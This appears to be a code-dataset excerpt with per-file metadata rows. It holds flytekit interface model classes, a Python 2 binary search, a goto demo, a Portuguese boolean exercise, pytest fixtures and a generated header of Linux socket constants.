:param flyteidl.core.interface_pb2.Variable variable_proto:
:rtype: Variable
"""
return cls(
type=_types.LiteralType.from_flyte_idl(variable_proto.type),
description=variable_proto.description,
)
class VariableMap(_common.FlyteIdlEntity):
def __init__(self, variables):
"""
A map of Variables
:param dict[Text, Variable] variables:
"""
self._variables = variables
@property
def variables(self):
"""
:rtype: dict[Text, Variable]
"""
return self._variables
def to_flyte_idl(self):
"""
:rtype: dict[Text, Variable]
"""
return _interface_pb2.VariableMap(variables={k: v.to_flyte_idl() for k, v in _six.iteritems(self.variables)})
@classmethod
def from_flyte_idl(cls, pb2_object):
"""
:param dict[Text, Variable] pb2_object:
:rtype: VariableMap
"""
return cls({k: Variable.from_flyte_idl(v) for k, v in _six.iteritems(pb2_object.variables)})
class TypedInterface(_common.FlyteIdlEntity):
def __init__(self, inputs, outputs):
"""
Please note that this model is slightly incorrect, but is more user-friendly. The underlying inputs and
outputs are represented directly as Python dicts, rather than going through the additional VariableMap layer.
:param dict[Text, Variable] inputs: This defines the names and types for the interface's inputs.
:param dict[Text, Variable] outputs: This defines the names and types for the interface's outputs.
"""
self._inputs = inputs
self._outputs = outputs
@property
def inputs(self) -> typing.Dict[str, Variable]:
return self._inputs
@property
def outputs(self) -> typing.Dict[str, Variable]:
return self._outputs
def to_flyte_idl(self) -> _interface_pb2.TypedInterface:
return _interface_pb2.TypedInterface(
inputs=_interface_pb2.VariableMap(variables={k: v.to_flyte_idl() for k, v in _six.iteritems(self.inputs)}),
outputs=_interface_pb2.VariableMap(
variables={k: v.to_flyte_idl() for k, v in _six.iteritems(self.outputs)}
),
)
@classmethod
def from_flyte_idl(cls, proto: _interface_pb2.TypedInterface) -> "TypedInterface":
"""
:param proto:
"""
return cls(
inputs={k: Variable.from_flyte_idl(v) for k, v in _six.iteritems(proto.inputs.variables)},
outputs={k: Variable.from_flyte_idl(v) for k, v in _six.iteritems(proto.outputs.variables)},
)
class Parameter(_common.FlyteIdlEntity):
def __init__(self, var, default=None, required=None):
"""
Declares an input parameter. A parameter is used as input to a launch plan and has
the special ability to have a default value or mark itself as required.
:param Variable var: Defines a name and a type to reference/compare through out the system.
:param flytekit.models.literals.Literal default: [Optional] Defines a default value that has to match the
variable type defined.
:param bool required: [Optional] is this value required to be filled in?
"""
self._var = var
self._default = default
self._required = required
@property
def var(self):
"""
The variable definition for this input parameter.
:rtype: Variable
"""
return self._var
@property
def default(self):
"""
This is the default literal value that will be applied for this parameter if not user specified.
:rtype: flytekit.models.literals.Literal
"""
return self._default
@property
def required(self) -> bool:
"""
If True, this parameter must be specified. There cannot be a default value.
:rtype: bool
"""
return self._required
@property
def behavior(self):
"""
:rtype: T
"""
return self._default or self._required
def to_flyte_idl(self):
"""
:rtype: flyteidl.core.interface_pb2.Parameter
"""
return _interface_pb2.Parameter(
var=self.var.to_flyte_idl(),
default=self.default.to_flyte_idl() if self.default is not None else None,
required=self.required if self.default is None else None,
)
@classmethod
def from_flyte_idl(cls, pb2_object):
"""
:param flyteidl.core.interface_pb2.Parameter pb2_object:
:rtype: Parameter
"""
return cls(
Variable.from_flyte_idl(pb2_object.var),
_literals.Literal.from_flyte_idl(pb2_object.default) if pb2_object.HasField("default") else None,
pb2_object.required if pb2_object.HasField("required") else None,
)
class ParameterMap(_common.FlyteIdlEntity):
def __init__(self, parameters):
"""
A map of Parameters
:param dict[Text, Parameter]: parameters
"""
self._parameters = parameters
@property
def parameters(self):
"""
:rtype: dict[Text, Parameter]
"""
return self._parameters
def to_flyte_idl(self):
"""
:rtype: flyteidl.core.interface_pb2.ParameterMap
"""
return _interface_pb2.ParameterMap(
parameters={k: v.to_flyte_idl() for k, v in _six.iteritems(self.parameters)},
)
@classmethod
def from_flyte_idl(cls, pb2_object):
"""
:param flyteidl.core.interface_pb2.ParameterMap pb2_object:
:rtype: ParameterMap
"""
return cls(parameters={k: Parameter.from_flyte_idl(v) for k, v in _six.iteritems(pb2_object.parameters)})
| 32.553571 | 120 | 0.63316 | 865 | 7,292 | 5.163006 | 0.160694 | 0.042991 | 0.02687 | 0.012539 | 0.365876 | 0.298477 | 0.268697 | 0.253023 | 0.253023 | 0.243395 | 0 | 0.005697 | 0.277839 | 7,292 | 223 | 121 | 32.699552 | 0.842385 | 0.32186 | 0 | 0.247525 | 0 | 0 | 0.006804 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.247525 | false | 0 | 0.059406 | 0.029703 | 0.554455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
7258c7079413485094581655431edc0bdeab64d7 | 933 | py | Python | binary-search.py | derekmpham/interview-prep | 5881f03de3ffeeecca460e71b531f07e1dae7e46 | [
"MIT"
] | null | null | null | binary-search.py | derekmpham/interview-prep | 5881f03de3ffeeecca460e71b531f07e1dae7e46 | [
"MIT"
] | null | null | null | binary-search.py | derekmpham/interview-prep | 5881f03de3ffeeecca460e71b531f07e1dae7e46 | [
"MIT"
] | null | null | null | # iterative approach to binary search function (assume list has distinct elements and elements are in ascending order)
def binary_search(arr, data):
low = 0 # first element position in array
high = len(arr) - 1 # last element position in array
while low <= high: # iterate through "entire" array
middle = (low + high)/2
if arr[middle] == data:
return middle
elif arr[middle] < data:
low = middle + 1 # narrow down search to upper half
else:
high = middle - 1 # narrow down search to bottom half
return -1 # data not in array
# test cases
test = [1, 4, 5, 7, 8, 9, 11, 17, 19, 26, 32, 35, 36]
data_one = 11
data_two = 4
data_three = 35
data_four = 27
data_five = 38
print binary_search(test, data_one) # prints 6
print binary_search(test, data_two) # prints 1
print binary_search(test, data_three) # prints 11
print binary_search(test, data_four) # prints -1
print binary_search(test, data_five) # prints -1
| 31.1 | 118 | 0.708467 | 155 | 933 | 4.16129 | 0.445161 | 0.130233 | 0.131783 | 0.162791 | 0.293023 | 0.176744 | 0.099225 | 0 | 0 | 0 | 0 | 0.054886 | 0.199357 | 933 | 29 | 119 | 32.172414 | 0.808568 | 0.379421 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.217391 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
725b4074b04ad16b7633d15c37467b95f226f606 | 236 | py | Python | jygoto/gototest.py | agren/jython-goto | 344a061cc81097fc01252d827d0c4d3c024ce9ec | [
"CNRI-Jython"
] | null | null | null | jygoto/gototest.py | agren/jython-goto | 344a061cc81097fc01252d827d0c4d3c024ce9ec | [
"CNRI-Jython"
] | null | null | null | jygoto/gototest.py | agren/jython-goto | 344a061cc81097fc01252d827d0c4d3c024ce9ec | [
"CNRI-Jython"
] | null | null | null | # If everything works this script should print:
# Goto test
# Hello
# World!
#
from jygoto import goto
from jygoto import label
print "Goto test"
goto .my_label
print "Goodbye"
label .my_label
print "Hello"
print "World!"
| 14.75 | 47 | 0.707627 | 34 | 236 | 4.852941 | 0.5 | 0.181818 | 0.157576 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.216102 | 236 | 15 | 48 | 15.733333 | 0.891892 | 0.338983 | 0 | 0 | 0 | 0 | 0.18 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.25 | null | null | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
72652e03333656edaa08f0f06d5503faee83cba4 | 724 | py | Python | cap-3/exercicios/Exercicio-3.3.py | JeffeSilva/EP-python | a4d8ccb727ab9e10785b2dfd219cff72e0d808f5 | [
"MIT"
] | 1 | 2021-01-07T12:43:48.000Z | 2021-01-07T12:43:48.000Z | cap-3/exercicios/Exercicio-3.3.py | JeffeSilva/EP-python | a4d8ccb727ab9e10785b2dfd219cff72e0d808f5 | [
"MIT"
] | null | null | null | cap-3/exercicios/Exercicio-3.3.py | JeffeSilva/EP-python | a4d8ccb727ab9e10785b2dfd219cff72e0d808f5 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Exercicio 3.3 - Complete a tabela a seguir utilizando a = True, b = false e c = True
print (' ')
a = True
b = False
c = True
# Expressões e resultados
a1 = a and a
b1 = b and b
c1 = not c
d1 = not b
e1 = not a
f1 = a and b
g1 = b and c
h1 = a or c
i1 = b or c
j1 = c or a
k1 = c or b
l1 = c or c
m1 = b or b
#Resultados na tela
print (f'a and a -/- {a1}')
print (f'b and b -/- {b1}')
print (f'not c -/- {c1}')
print (f'not b -/- {d1}')
print (f'not a -/- {e1}')
print (f'a and b -/- {f1}')
print (f'b and c -/- {g1}')
print (f'a or c -/- {h1}')
print (f'b or c -/- {i1}')
print (f'c or a -/- {j1}')
print (f'c or b -/- {k1}')
print (f'c or c -/- {l1}')
print (f'b or b -/- {m1}')
print (' ')
| 19.567568 | 86 | 0.524862 | 158 | 724 | 2.405063 | 0.240506 | 0.205263 | 0.073684 | 0.071053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052336 | 0.26105 | 724 | 36 | 87 | 20.111111 | 0.657944 | 0.203039 | 0 | 0.064516 | 0 | 0 | 0.356643 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.483871 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
7266f0df3ad29b9d103b31ee5894b5b4e55f6020 | 58 | py | Python | mlflow/version.py | parkerzf/mlflow | 58f70d522d439ab26f777dbd32de77f79c0235bc | [
"Apache-2.0"
] | 12 | 2018-08-11T08:25:31.000Z | 2018-08-28T23:41:23.000Z | mlflow/version.py | parkerzf/mlflow | 58f70d522d439ab26f777dbd32de77f79c0235bc | [
"Apache-2.0"
] | 17 | 2018-08-11T00:26:26.000Z | 2018-08-29T10:14:17.000Z | mlflow/version.py | parkerzf/mlflow | 58f70d522d439ab26f777dbd32de77f79c0235bc | [
"Apache-2.0"
] | 3 | 2018-08-21T15:14:51.000Z | 2019-11-06T23:25:32.000Z | # Copyright 2018 Databricks, Inc.
VERSION = '0.7.0.dev'
| 11.6 | 33 | 0.672414 | 9 | 58 | 4.333333 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145833 | 0.172414 | 58 | 4 | 34 | 14.5 | 0.666667 | 0.534483 | 0 | 0 | 0 | 0 | 0.36 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7267bcbd42dccb7add74ade4734c01f0858c1918 | 1,226 | py | Python | pytest_config/fixtures.py | buzzfeed/pytest_config | 86bdc1fecec46d7b944998704534c73cb16ddd43 | [
"MIT"
] | 4 | 2015-07-27T08:17:24.000Z | 2016-07-24T15:44:16.000Z | pytest_config/fixtures.py | buzzfeed/pytest_config | 86bdc1fecec46d7b944998704534c73cb16ddd43 | [
"MIT"
] | null | null | null | pytest_config/fixtures.py | buzzfeed/pytest_config | 86bdc1fecec46d7b944998704534c73cb16ddd43 | [
"MIT"
] | 2 | 2018-03-04T21:49:52.000Z | 2018-05-25T20:10:25.000Z | from .logger import logger
from . import pretty
import pytest
def _error(e):
error = '{}: {}'.format(type(e).__name__, str(e))
logger.debug(pretty.colorize_text(error, color=pretty.YELLOW))
@pytest.fixture(scope='module')
def timezone():
""" A shortcut to the `django.utils.timezone` module. """
from django.utils import timezone
return timezone
@pytest.fixture(scope='module')
def pytz():
""" A shortcut to the `pytz` module. """
import pytz
return pytz
@pytest.fixture(scope='module')
def json():
""" A shortcut to the `json` module. """
import json
return json
@pytest.fixture(scope='module')
def mock():
"""
A shortcut to the `mock` module. If mock is not installed,
an error will be logged and no module will be available.
"""
try:
import mock
return mock
except ImportError as e:
_error(e)
@pytest.fixture(scope='module')
def model_mommy():
"""
A shortcut to the `model_mommy.mommy` module. If model_mommy is not
installed, an error will be logged and no module will be available.
"""
try:
from model_mommy import mommy
return mommy
except ImportError as e:
_error(e)
| 21.892857 | 71 | 0.644372 | 166 | 1,226 | 4.686747 | 0.289157 | 0.083548 | 0.115681 | 0.154242 | 0.399743 | 0.226221 | 0.159383 | 0.159383 | 0.159383 | 0.159383 | 0 | 0 | 0.239804 | 1,226 | 55 | 72 | 22.290909 | 0.834764 | 0.300979 | 0 | 0.34375 | 0 | 0 | 0.045056 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.3125 | 0 | 0.65625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
726890c74100dd5874d4d8acf6f69d3b76ae031c | 14,614 | py | Python | lib-python/2.5.2/plat-linux2/IN.py | woodrow/pyoac | b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7 | [
"MIT"
] | 1 | 2019-05-27T00:58:46.000Z | 2019-05-27T00:58:46.000Z | lib-python/2.5.2/plat-linux2/IN.py | woodrow/pyoac | b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7 | [
"MIT"
] | null | null | null | lib-python/2.5.2/plat-linux2/IN.py | woodrow/pyoac | b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7 | [
"MIT"
] | null | null | null | # Generated by h2py from /usr/include/netinet/in.h
_NETINET_IN_H = 1
# Included from features.h
_FEATURES_H = 1
__USE_ANSI = 1
__FAVOR_BSD = 1
_ISOC99_SOURCE = 1
_POSIX_SOURCE = 1
_POSIX_C_SOURCE = 199506L
_XOPEN_SOURCE = 600
_XOPEN_SOURCE_EXTENDED = 1
_LARGEFILE64_SOURCE = 1
_BSD_SOURCE = 1
_SVID_SOURCE = 1
_BSD_SOURCE = 1
_SVID_SOURCE = 1
__USE_ISOC99 = 1
_POSIX_SOURCE = 1
_POSIX_C_SOURCE = 2
_POSIX_C_SOURCE = 199506L
__USE_POSIX = 1
__USE_POSIX2 = 1
__USE_POSIX199309 = 1
__USE_POSIX199506 = 1
__USE_XOPEN = 1
__USE_XOPEN_EXTENDED = 1
__USE_UNIX98 = 1
_LARGEFILE_SOURCE = 1
__USE_XOPEN2K = 1
__USE_ISOC99 = 1
__USE_XOPEN_EXTENDED = 1
__USE_LARGEFILE = 1
__USE_LARGEFILE64 = 1
__USE_FILE_OFFSET64 = 1
__USE_MISC = 1
__USE_BSD = 1
__USE_SVID = 1
__USE_GNU = 1
__USE_REENTRANT = 1
__STDC_IEC_559__ = 1
__STDC_IEC_559_COMPLEX__ = 1
__STDC_ISO_10646__ = 200009L
__GNU_LIBRARY__ = 6
__GLIBC__ = 2
__GLIBC_MINOR__ = 2
# Included from sys/cdefs.h
_SYS_CDEFS_H = 1
def __PMT(args): return args
def __P(args): return args
def __PMT(args): return args
def __STRING(x): return #x
__flexarr = []
__flexarr = [0]
__flexarr = []
__flexarr = [1]
def __ASMNAME(cname): return __ASMNAME2 (__USER_LABEL_PREFIX__, cname)
def __attribute__(xyz): return
def __attribute_format_arg__(x): return __attribute__ ((__format_arg__ (x)))
def __attribute_format_arg__(x): return
__USE_LARGEFILE = 1
__USE_LARGEFILE64 = 1
__USE_EXTERN_INLINES = 1
# Included from gnu/stubs.h
# Included from stdint.h
_STDINT_H = 1
# Included from bits/wchar.h
_BITS_WCHAR_H = 1
__WCHAR_MIN = (-2147483647l - 1l)
__WCHAR_MAX = (2147483647l)
# Included from bits/wordsize.h
__WORDSIZE = 32
def __INT64_C(c): return c ## L
def __UINT64_C(c): return c ## UL
def __INT64_C(c): return c ## LL
def __UINT64_C(c): return c ## ULL
INT8_MIN = (-128)
INT16_MIN = (-32767-1)
INT32_MIN = (-2147483647-1)
INT64_MIN = (-__INT64_C(9223372036854775807)-1)
INT8_MAX = (127)
INT16_MAX = (32767)
INT32_MAX = (2147483647)
INT64_MAX = (__INT64_C(9223372036854775807))
UINT8_MAX = (255)
UINT16_MAX = (65535)
UINT64_MAX = (__UINT64_C(18446744073709551615))
INT_LEAST8_MIN = (-128)
INT_LEAST16_MIN = (-32767-1)
INT_LEAST32_MIN = (-2147483647-1)
INT_LEAST64_MIN = (-__INT64_C(9223372036854775807)-1)
INT_LEAST8_MAX = (127)
INT_LEAST16_MAX = (32767)
INT_LEAST32_MAX = (2147483647)
INT_LEAST64_MAX = (__INT64_C(9223372036854775807))
UINT_LEAST8_MAX = (255)
UINT_LEAST16_MAX = (65535)
UINT_LEAST64_MAX = (__UINT64_C(18446744073709551615))
INT_FAST8_MIN = (-128)
INT_FAST16_MIN = (-9223372036854775807L-1)
INT_FAST32_MIN = (-9223372036854775807L-1)
INT_FAST16_MIN = (-2147483647-1)
INT_FAST32_MIN = (-2147483647-1)
INT_FAST64_MIN = (-__INT64_C(9223372036854775807)-1)
INT_FAST8_MAX = (127)
INT_FAST16_MAX = (9223372036854775807L)
INT_FAST32_MAX = (9223372036854775807L)
INT_FAST16_MAX = (2147483647)
INT_FAST32_MAX = (2147483647)
INT_FAST64_MAX = (__INT64_C(9223372036854775807))
UINT_FAST8_MAX = (255)
UINT_FAST64_MAX = (__UINT64_C(18446744073709551615))
INTPTR_MIN = (-9223372036854775807L-1)
INTPTR_MAX = (9223372036854775807L)
INTPTR_MIN = (-2147483647-1)
INTPTR_MAX = (2147483647)
INTMAX_MIN = (-__INT64_C(9223372036854775807)-1)
INTMAX_MAX = (__INT64_C(9223372036854775807))
UINTMAX_MAX = (__UINT64_C(18446744073709551615))
PTRDIFF_MIN = (-9223372036854775807L-1)
PTRDIFF_MAX = (9223372036854775807L)
PTRDIFF_MIN = (-2147483647-1)
PTRDIFF_MAX = (2147483647)
SIG_ATOMIC_MIN = (-2147483647-1)
SIG_ATOMIC_MAX = (2147483647)
WCHAR_MIN = __WCHAR_MIN
WCHAR_MAX = __WCHAR_MAX
def INT8_C(c): return c
def INT16_C(c): return c
def INT32_C(c): return c
def INT64_C(c): return c ## L
def INT64_C(c): return c ## LL
def UINT8_C(c): return c ## U
def UINT16_C(c): return c ## U
def UINT32_C(c): return c ## U
def UINT64_C(c): return c ## UL
def UINT64_C(c): return c ## ULL
def INTMAX_C(c): return c ## L
def UINTMAX_C(c): return c ## UL
def INTMAX_C(c): return c ## LL
def UINTMAX_C(c): return c ## ULL
# Included from bits/types.h
_BITS_TYPES_H = 1
__FD_SETSIZE = 1024
# Included from bits/pthreadtypes.h
_BITS_PTHREADTYPES_H = 1
# Included from bits/sched.h
SCHED_OTHER = 0
SCHED_FIFO = 1
SCHED_RR = 2
CSIGNAL = 0x000000ff
CLONE_VM = 0x00000100
CLONE_FS = 0x00000200
CLONE_FILES = 0x00000400
CLONE_SIGHAND = 0x00000800
CLONE_PID = 0x00001000
CLONE_PTRACE = 0x00002000
CLONE_VFORK = 0x00004000
__defined_schedparam = 1
def IN_CLASSA(a): return ((((in_addr_t)(a)) & (-2147483648)) == 0)
IN_CLASSA_NET = (-16777216)
IN_CLASSA_NSHIFT = 24
IN_CLASSA_HOST = ((-1) & ~IN_CLASSA_NET)
IN_CLASSA_MAX = 128
def IN_CLASSB(a): return ((((in_addr_t)(a)) & (-1073741824)) == (-2147483648))
IN_CLASSB_NET = (-65536)
IN_CLASSB_NSHIFT = 16
IN_CLASSB_HOST = ((-1) & ~IN_CLASSB_NET)
IN_CLASSB_MAX = 65536
def IN_CLASSC(a): return ((((in_addr_t)(a)) & (-536870912)) == (-1073741824))
IN_CLASSC_NET = (-256)
IN_CLASSC_NSHIFT = 8
IN_CLASSC_HOST = ((-1) & ~IN_CLASSC_NET)
def IN_CLASSD(a): return ((((in_addr_t)(a)) & (-268435456)) == (-536870912))
def IN_MULTICAST(a): return IN_CLASSD(a)
def IN_EXPERIMENTAL(a): return ((((in_addr_t)(a)) & (-536870912)) == (-536870912))
def IN_BADCLASS(a): return ((((in_addr_t)(a)) & (-268435456)) == (-268435456))
IN_LOOPBACKNET = 127
INET_ADDRSTRLEN = 16
INET6_ADDRSTRLEN = 46
# Included from bits/socket.h
# Included from limits.h
_LIBC_LIMITS_H_ = 1
MB_LEN_MAX = 16
_LIMITS_H = 1
CHAR_BIT = 8
SCHAR_MIN = (-128)
SCHAR_MAX = 127
UCHAR_MAX = 255
CHAR_MIN = 0
CHAR_MAX = UCHAR_MAX
CHAR_MIN = SCHAR_MIN
CHAR_MAX = SCHAR_MAX
SHRT_MIN = (-32768)
SHRT_MAX = 32767
USHRT_MAX = 65535
INT_MAX = 2147483647
LONG_MAX = 9223372036854775807L
LONG_MAX = 2147483647L
LONG_MIN = (-LONG_MAX - 1L)
# Included from bits/posix1_lim.h
_BITS_POSIX1_LIM_H = 1
_POSIX_AIO_LISTIO_MAX = 2
_POSIX_AIO_MAX = 1
_POSIX_ARG_MAX = 4096
_POSIX_CHILD_MAX = 6
_POSIX_DELAYTIMER_MAX = 32
_POSIX_LINK_MAX = 8
_POSIX_MAX_CANON = 255
_POSIX_MAX_INPUT = 255
_POSIX_MQ_OPEN_MAX = 8
_POSIX_MQ_PRIO_MAX = 32
_POSIX_NGROUPS_MAX = 0
_POSIX_OPEN_MAX = 16
_POSIX_FD_SETSIZE = _POSIX_OPEN_MAX
_POSIX_NAME_MAX = 14
_POSIX_PATH_MAX = 256
_POSIX_PIPE_BUF = 512
_POSIX_RTSIG_MAX = 8
_POSIX_SEM_NSEMS_MAX = 256
_POSIX_SEM_VALUE_MAX = 32767
_POSIX_SIGQUEUE_MAX = 32
_POSIX_SSIZE_MAX = 32767
_POSIX_STREAM_MAX = 8
_POSIX_TZNAME_MAX = 6
_POSIX_QLIMIT = 1
_POSIX_HIWAT = _POSIX_PIPE_BUF
_POSIX_UIO_MAXIOV = 16
_POSIX_TTY_NAME_MAX = 9
_POSIX_TIMER_MAX = 32
_POSIX_LOGIN_NAME_MAX = 9
_POSIX_CLOCKRES_MIN = 20000000
# Included from bits/local_lim.h
# Included from linux/limits.h
NR_OPEN = 1024
NGROUPS_MAX = 32
ARG_MAX = 131072
CHILD_MAX = 999
OPEN_MAX = 256
LINK_MAX = 127
MAX_CANON = 255
MAX_INPUT = 255
NAME_MAX = 255
PATH_MAX = 4096
PIPE_BUF = 4096
RTSIG_MAX = 32
_POSIX_THREAD_KEYS_MAX = 128
PTHREAD_KEYS_MAX = 1024
_POSIX_THREAD_DESTRUCTOR_ITERATIONS = 4
PTHREAD_DESTRUCTOR_ITERATIONS = _POSIX_THREAD_DESTRUCTOR_ITERATIONS
_POSIX_THREAD_THREADS_MAX = 64
PTHREAD_THREADS_MAX = 1024
AIO_PRIO_DELTA_MAX = 20
PTHREAD_STACK_MIN = 16384
TIMER_MAX = 256
SSIZE_MAX = LONG_MAX
NGROUPS_MAX = _POSIX_NGROUPS_MAX
# Included from bits/posix2_lim.h
_BITS_POSIX2_LIM_H = 1
_POSIX2_BC_BASE_MAX = 99
_POSIX2_BC_DIM_MAX = 2048
_POSIX2_BC_SCALE_MAX = 99
_POSIX2_BC_STRING_MAX = 1000
_POSIX2_COLL_WEIGHTS_MAX = 2
_POSIX2_EXPR_NEST_MAX = 32
_POSIX2_LINE_MAX = 2048
_POSIX2_RE_DUP_MAX = 255
_POSIX2_CHARCLASS_NAME_MAX = 14
BC_BASE_MAX = _POSIX2_BC_BASE_MAX
BC_DIM_MAX = _POSIX2_BC_DIM_MAX
BC_SCALE_MAX = _POSIX2_BC_SCALE_MAX
BC_STRING_MAX = _POSIX2_BC_STRING_MAX
COLL_WEIGHTS_MAX = 255
EXPR_NEST_MAX = _POSIX2_EXPR_NEST_MAX
LINE_MAX = _POSIX2_LINE_MAX
CHARCLASS_NAME_MAX = 2048
RE_DUP_MAX = (0x7fff)
# Included from bits/xopen_lim.h
_XOPEN_LIM_H = 1
# Included from bits/stdio_lim.h
L_tmpnam = 20
TMP_MAX = 238328
FILENAME_MAX = 4096
L_ctermid = 9
L_cuserid = 9
FOPEN_MAX = 16
IOV_MAX = 1024
_XOPEN_IOV_MAX = _POSIX_UIO_MAXIOV
NL_ARGMAX = _POSIX_ARG_MAX
NL_LANGMAX = _POSIX2_LINE_MAX
NL_MSGMAX = INT_MAX
NL_NMAX = INT_MAX
NL_SETMAX = INT_MAX
NL_TEXTMAX = INT_MAX
NZERO = 20
WORD_BIT = 16
WORD_BIT = 32
WORD_BIT = 64
WORD_BIT = 16
WORD_BIT = 32
WORD_BIT = 64
WORD_BIT = 32
LONG_BIT = 32
LONG_BIT = 64
LONG_BIT = 32
LONG_BIT = 64
LONG_BIT = 64
LONG_BIT = 32
from TYPES import *
PF_UNSPEC = 0
PF_LOCAL = 1
PF_UNIX = PF_LOCAL
PF_FILE = PF_LOCAL
PF_INET = 2
PF_AX25 = 3
PF_IPX = 4
PF_APPLETALK = 5
PF_NETROM = 6
PF_BRIDGE = 7
PF_ATMPVC = 8
PF_X25 = 9
PF_INET6 = 10
PF_ROSE = 11
PF_DECnet = 12
PF_NETBEUI = 13
PF_SECURITY = 14
PF_KEY = 15
PF_NETLINK = 16
PF_ROUTE = PF_NETLINK
PF_PACKET = 17
PF_ASH = 18
PF_ECONET = 19
PF_ATMSVC = 20
PF_SNA = 22
PF_IRDA = 23
PF_PPPOX = 24
PF_WANPIPE = 25
PF_BLUETOOTH = 31
PF_MAX = 32
AF_UNSPEC = PF_UNSPEC
AF_LOCAL = PF_LOCAL
AF_UNIX = PF_UNIX
AF_FILE = PF_FILE
AF_INET = PF_INET
AF_AX25 = PF_AX25
AF_IPX = PF_IPX
AF_APPLETALK = PF_APPLETALK
AF_NETROM = PF_NETROM
AF_BRIDGE = PF_BRIDGE
AF_ATMPVC = PF_ATMPVC
AF_X25 = PF_X25
AF_INET6 = PF_INET6
AF_ROSE = PF_ROSE
AF_DECnet = PF_DECnet
AF_NETBEUI = PF_NETBEUI
AF_SECURITY = PF_SECURITY
AF_KEY = PF_KEY
AF_NETLINK = PF_NETLINK
AF_ROUTE = PF_ROUTE
AF_PACKET = PF_PACKET
AF_ASH = PF_ASH
AF_ECONET = PF_ECONET
AF_ATMSVC = PF_ATMSVC
AF_SNA = PF_SNA
AF_IRDA = PF_IRDA
AF_PPPOX = PF_PPPOX
AF_WANPIPE = PF_WANPIPE
AF_BLUETOOTH = PF_BLUETOOTH
AF_MAX = PF_MAX
SOL_RAW = 255
SOL_DECNET = 261
SOL_X25 = 262
SOL_PACKET = 263
SOL_ATM = 264
SOL_AAL = 265
SOL_IRDA = 266
SOMAXCONN = 128
# Included from bits/sockaddr.h
_BITS_SOCKADDR_H = 1
def __SOCKADDR_COMMON(sa_prefix): return \
_SS_SIZE = 128
def CMSG_FIRSTHDR(mhdr): return \
# Included from asm/socket.h
# Included from linux/sockios.h
SIOCADDRT = 0x890B
SIOCDELRT = 0x890C
SIOCRTMSG = 0x890D
SIOCGIFNAME = 0x8910
SIOCSIFLINK = 0x8911
SIOCGIFCONF = 0x8912
SIOCGIFFLAGS = 0x8913
SIOCSIFFLAGS = 0x8914
SIOCGIFADDR = 0x8915
SIOCSIFADDR = 0x8916
SIOCGIFDSTADDR = 0x8917
SIOCSIFDSTADDR = 0x8918
SIOCGIFBRDADDR = 0x8919
SIOCSIFBRDADDR = 0x891a
SIOCGIFNETMASK = 0x891b
SIOCSIFNETMASK = 0x891c
SIOCGIFMETRIC = 0x891d
SIOCSIFMETRIC = 0x891e
SIOCGIFMEM = 0x891f
SIOCSIFMEM = 0x8920
SIOCGIFMTU = 0x8921
SIOCSIFMTU = 0x8922
SIOCSIFNAME = 0x8923
SIOCSIFHWADDR = 0x8924
SIOCGIFENCAP = 0x8925
SIOCSIFENCAP = 0x8926
SIOCGIFHWADDR = 0x8927
SIOCGIFSLAVE = 0x8929
SIOCSIFSLAVE = 0x8930
SIOCADDMULTI = 0x8931
SIOCDELMULTI = 0x8932
SIOCGIFINDEX = 0x8933
SIOGIFINDEX = SIOCGIFINDEX
SIOCSIFPFLAGS = 0x8934
SIOCGIFPFLAGS = 0x8935
SIOCDIFADDR = 0x8936
SIOCSIFHWBROADCAST = 0x8937
SIOCGIFCOUNT = 0x8938
SIOCGIFBR = 0x8940
SIOCSIFBR = 0x8941
SIOCGIFTXQLEN = 0x8942
SIOCSIFTXQLEN = 0x8943
SIOCGIFDIVERT = 0x8944
SIOCSIFDIVERT = 0x8945
SIOCETHTOOL = 0x8946
SIOCGMIIPHY = 0x8947
SIOCGMIIREG = 0x8948
